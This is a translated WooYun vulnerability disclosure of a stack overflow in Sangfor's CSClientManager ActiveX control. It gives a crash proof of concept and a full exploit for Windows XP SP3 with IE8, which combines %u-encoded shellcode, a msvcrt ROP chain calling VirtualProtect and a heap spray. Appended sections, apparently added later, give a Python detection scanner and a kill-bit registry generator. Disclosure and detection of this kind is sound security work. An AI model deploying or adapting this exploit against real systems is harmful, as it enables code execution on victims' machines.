
#4 Sangfor CSClientManager Activex Remote Code Execution bypass dep on ie8

Report number: 43078
URL: http://www.wooyun.org/bug.php?action=view&id=43078
Status: confirmed by vendor
Title: #4 Sangfor CSClientManager Activex Remote Code Execution bypass dep on ie8
Type: remote code execution
Vendor: 深信服 (Sangfor)
White hat: 想要减肥的胖纸
Submitted: 2013-11-16 17:00:00
Published: 2014-02-14 17:01:00
Fixed: (not set)
Confirmed: 2013-11-18 00:00:00
Confirm spend: 2
Tags: remote code execution, ActiveX vulnerability
Followers: 0
Favorites: 0
White hat rating:
White hat self-assessed rank: 15
Vendor rating:
Vendor-assessed rank: 8
Summary
[+] Looking for cyclic pattern in memory
    Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes)
    Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
    Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes)
    Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes)
    Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes)
    Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes)
    Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes)
    Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes)
    Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes)
    EIP overwritten with normal pattern : 0x67413367 (offset 190)
    ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
    EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
    SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
Details

The vulnerable control is what Sangfor's official login channel installs, so please upgrade it. Judging by the version string this appears to be the new 6.0 release; the earlier vulnerability was in the 4.x versions.

Name:          CSClientManager Class
Publisher:     Sangfor Technologies Co.,Ltd
Type:          ActiveX control
Version:       6.0.0.0
File date:
Last accessed: 2013-11-16, 14:51
Class ID:      {D257CF85-8E97-4C9B-8407-459B28006000}
Use count:     118
Blocked count: 0
File:          CSClientManagerPrj.dll
Folder:        C:\Program Files\Sangfor\SSL\ClientComponent3



POC

<html>
<object classid='clsid:D257CF85-8E97-4C9B-8407-459B28006000' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 190) junk1+="A";
eip = "BBBB";
junk2 = "CCCCCCCCCCCCCCCCCCCC";
nseh = "DDDD";
seh ="EEEE";
junk3 = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF";
payload = junk1 + eip + junk2 + nseh + seh + junk3;
target.checkRelogin(payload);
</script>
</html>


[Screenshot: QQ20131116-1@2x.png]


Tested on Windows XP SP3 with IE8.
ROP chain to bypass DEP:

<html>
<head>
<title>Sangfor Activex stack overflow PoC bypass dep on xpsp3 ie8</title>
</head>
<body>
<!--[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03710440 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03710c76 (length 1000 bytes)
Cyclic pattern (normal) found at 0x00188a88 (length 16 bytes)
Cyclic pattern (normal) found at 0x03dedc28 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e52d10 (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x0409d632 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03705d6c (length 252 bytes)
Cyclic pattern (unicode) found at 0x03707e00 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03708cf6 (length 999 bytes)
Cyclic pattern (unicode) found at 0x03e05fb4 (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
0x016ad0f0 : Contains normal cyclic pattern at ESP-0xc4 (-196) : offset 2, length 998 (-> 0x016ad4d5 : ESP+0x322)
-->
<object classid="clsid:D257CF85-8E97-4C9B-8407-459B28006000" id='poc'></object>
<script>
// [ Shellcode ]
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
var rop_chain = //"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4B\u77BE" + // 0x77BEBE4B # pop ebp # retn [msvcrt.dll]
// "\u5ED5\u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// The real rop chain
"\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll]
"\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll]
"\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll]
"\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize]
"\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll]
"\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx
"\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll]
"\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll]
"\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll]
"\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll]
"\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll]
"\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]
"\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll]
"\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31
"\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
"\u1025\u77c2"; // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll]
// [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes
var fill = "\u0c0c\u0c0c";
while (fill.length < 0x1000){
fill += fill;
}
// [ padding offset ]
padding = fill.substring(0, 0x5F6);
// [ fill each chunk with 0x1000 bytes ]
evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
// [ repeat the block to 512KB ]
while (evilcode.length < 0x40000){
evilcode += evilcode;
}
// [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]
var block = evilcode.substring(2, 0x40000 - 0x21);
// [ Allocate 200 MB ]
var slide = new Array();
for (var i = 0; i < 400; i++){
slide[i] = block.substring(0, block.length);
}
var junk = '';
while(junk.length<190) junk += 'A';
popeax = "\x28\x7b\x71\x7d";// 0x7d717b28 {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll)
xchg = "\x79\x68\x44\x3e"; //0x3e446879 {PAGE_EXECUTE_READ} [WININET.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.19394 (C:\WINDOWS\system32\WININET.dll)
str = "\x0c\x0c\x0c\x0c";
payload = junk + popeax + str +str +xchg;
poc.checkRelogin(payload);
</script>
</body>
</html>


[Screenshot: QQ20131116-2@2x.png]
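Both PoCs above instantiate the control by its CLSID and call checkRelogin with a script-built string; the DEP-bypass version adds a %u-encoded blob, a 0x0c0c0c0c filler and a self-doubling string loop for the heap spray. As an added defensive example that is not part of the report, here is a Python scanner a web proxy, mail gateway or IR triage script could run over fetched HTML to flag pages carrying that combination. The indicator regexes and the two sample pages are my own constructions; only the CLSID and the method name come from the report.

```python
"""Static scanner for web content that targets the Sangfor CSClientManager control.

Added defensive example, not code from the WooYun report. Flags pages that
instantiate CLSID D257CF85-8E97-4C9B-8407-459B28006000 together with the
exploitation indicators visible in the report's PoCs. The regex heuristics and
the sample pages below are assumptions/constructions, not vendor material.
"""
import re

# CLSID of the vulnerable control (from the report).
VULN_CLSID = "D257CF85-8E97-4C9B-8407-459B28006000"

# Indicator name -> regex. Tuned to the shapes seen in the report's PoCs.
INDICATORS = {
    # <object classid="clsid:D257CF85-..."> instantiates the control
    "instantiates_control": re.compile(
        r"classid\s*=\s*['\"]?\s*clsid:\s*" + re.escape(VULN_CLSID), re.I),
    # scripted call of the overflowed method
    "calls_checkRelogin": re.compile(r"\.checkRelogin\s*\(", re.I),
    # unescape('%uXXXX%uXXXX...'): 32+ unicode-packed words, i.e. a binary blob
    "unicode_blob": re.compile(r"unescape\s*\(\s*['\"](?:%u[0-9a-f]{4}){32,}", re.I),
    # repeated 0x0c0c0c0c filler, the classic IE heap-spray value
    "heap_spray_filler": re.compile(r"(?:\\u0c0c|%u0c0c){2,}", re.I),
    # while (x.length < N) { x += x; }  exponential growth used to build spray blocks
    "self_doubling_loop": re.compile(
        r"while\s*\(\s*(\w+)\.length\s*<\s*(?:0x[0-9a-f]+|\d+)\s*\)\s*\{?\s*\1\s*\+=\s*\1\b",
        re.I),
}


def scan_html(html: str) -> dict:
    """Return {indicator_name: bool} for one page body."""
    return {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}


def verdict(html: str) -> str:
    """Classify a page.

    block  : control instantiated, checkRelogin called from script, and a spray
             or packed-blob indicator present (shape of the DEP-bypass PoC)
    review : control instantiated and checkRelogin called from script, nothing
             else (shape of the plain crash PoC; also possible on odd legit pages)
    allow  : everything else, including pages that merely embed the control
    """
    f = scan_html(html)
    if not f["instantiates_control"]:
        return "allow"
    spray = f["unicode_blob"] or f["heap_spray_filler"] or f["self_doubling_loop"]
    if f["calls_checkRelogin"] and spray:
        return "block"
    if f["calls_checkRelogin"]:
        return "review"
    return "allow"


# --- constructed samples (not the report's pages) -------------------------
# A plausible legitimate login page that only embeds the control.
BENIGN_PAGE = """<html><body>
<object classid='clsid:D257CF85-8E97-4C9B-8407-459B28006000' id='mgr'></object>
<p>SSL VPN login</p>
</body></html>"""

# A page shaped like the report's DEP-bypass PoC, with the binary content
# replaced by an inert %u9090 placeholder (not real shellcode or a ROP chain).
SUSPICIOUS_PAGE = """<html><body>
<object classid="clsid:D257CF85-8E97-4C9B-8407-459B28006000" id='poc'></object>
<script>
var blob = unescape('""" + "%u9090" * 40 + """');
var fill = "\\u0c0c\\u0c0c";
while (fill.length < 0x1000){
fill += fill;
}
var junk = '';
while(junk.length < 190) junk += 'A';
poc.checkRelogin(junk + fill + blob);
</script>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("suspicious", SUSPICIOUS_PAGE)):
        print(label, verdict(page), scan_html(page))
```

The "review" tier exists because a page that embeds the control and calls checkRelogin from script, but without any spray machinery, looks exactly like the first PoC and may still be a crash-only trigger; it is also what a fuzzed-looking but legitimate page would produce, so it is worth a human look rather than an automatic block.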

Fix

Status information:
2013-11-16: Details reported to the vendor; awaiting vendor handling
2013-11-18: Vendor confirmed; details disclosed to the vendor only
2013-11-21: Details opened to third-party security partners
2014-01-12: Details disclosed to core white hats and relevant domain experts
2014-01-22: Details disclosed to regular white hats
2014-02-01: Details disclosed to intern white hats
2014-02-14: Details disclosed to the public
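The report's fix section carries no remediation text. The standard host-side mitigation for a vulnerable ActiveX control is Internet Explorer's kill bit: a "Compatibility Flags" value of 0x400 under the ActiveX Compatibility key for the control's CLSID, after which IE refuses to instantiate it from web content (documented in Microsoft KB 240797). The following Python is an added example, not vendor or report code: it generates the .reg file for the CLSID from the report and parses such a file (or a regedit export) back to verify the bit is set. The kill bit also blocks legitimate use of the control in IE, i.e. the SSL VPN login, so it suits hosts that receive the upgraded client first or do not need the control at all.

```python
r"""Generate and verify an Internet Explorer ActiveX kill-bit .reg file.

Added example, not code from the report or from Sangfor. The kill bit is the
documented Compatibility Flags value 0x400 under
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
(Microsoft KB 240797); both the native and the Wow6432Node key are emitted so
32-bit IE on 64-bit Windows is covered. The registry paths are the documented
ones; the CLSID comes from the report's add-on details.
"""
import re

KILLBIT_FLAG = 0x400  # bit that makes IE refuse to load the control from web content

# CLSID of the Sangfor CSClientManager control, from the report.
SANGFOR_CSCLIENTMANAGER = "{D257CF85-8E97-4C9B-8407-459B28006000}"

ACTIVEX_COMPAT_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility",
)

CLSID_RE = re.compile(r"^\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}$")
KEY_RE = re.compile(r"^\[.*\\ActiveX Compatibility\\(\{[0-9A-Fa-f-]{36}\})\]$")
FLAG_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$')


def normalize_clsid(clsid: str) -> str:
    """Upper-case and brace-wrap a CLSID, rejecting anything that is not one."""
    c = clsid.strip().upper()
    if not c.startswith("{"):
        c = "{" + c + "}"
    if not CLSID_RE.match(c):
        raise ValueError(f"not a CLSID: {clsid!r}")
    return c


def killbit_reg(clsids) -> str:
    """Return the text of a .reg file that sets the kill bit for every CLSID given."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in map(normalize_clsid, clsids):
        for base in ACTIVEX_COMPAT_KEYS:
            lines.append(f"[{base}\\{clsid}]")
            lines.append(f'"Compatibility Flags"=dword:{KILLBIT_FLAG:08x}')
            lines.append("")
    return "\r\n".join(lines)  # regedit expects CRLF line endings


def killbitted_clsids(reg_text: str) -> set:
    r"""Parse .reg text (ours or a regedit export) and return the CLSIDs whose
    Compatibility Flags value has the kill bit set.

    To verify a host after import, feed it the output of:
      reg export "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" out.reg
    """
    found, current = set(), None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).upper()
            continue
        m = FLAG_RE.match(line)
        if m and current and int(m.group(1), 16) & KILLBIT_FLAG:
            found.add(current)
    return found


if __name__ == "__main__":
    text = killbit_reg([SANGFOR_CSCLIENTMANAGER])
    print(text)
    print("kill bit set for:", sorted(killbitted_clsids(text)))
```

Import the generated file with regedit or `reg import`, then re-export the key and run it through killbitted_clsids to confirm the CLSID is listed; the check looks at the bit rather than the whole value, so a host where other compatibility flags are already set still reports correctly.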
Vendor response
Response: severity: medium; vulnerability rank: 8; confirmed: 2013-11-18 16:53
Comments (comment, commenter, likes, time)

@超威蓝猫 One is code execution and the other is command execution; they are not the same.
VIP, 0 likes, 2013-11-16 20:53:00

remote code execution? Isn't it remote command execution..
超威蓝猫, 0 likes, 2013-11-16 17:13:00

@NetSeif +1 =。=
剑无名, 0 likes, 2013-11-16 17:05:00

Seeing the title, I thought I had landed on WooYun International...
NetSeif, 0 likes, 2013-11-16 17:02:00

"WooYun International" sounds so impressive... Microsoft China... Google China... WooYun International... impressive!!!!!!
NetSeif, 0 likes, 2013-11-16 17:02:00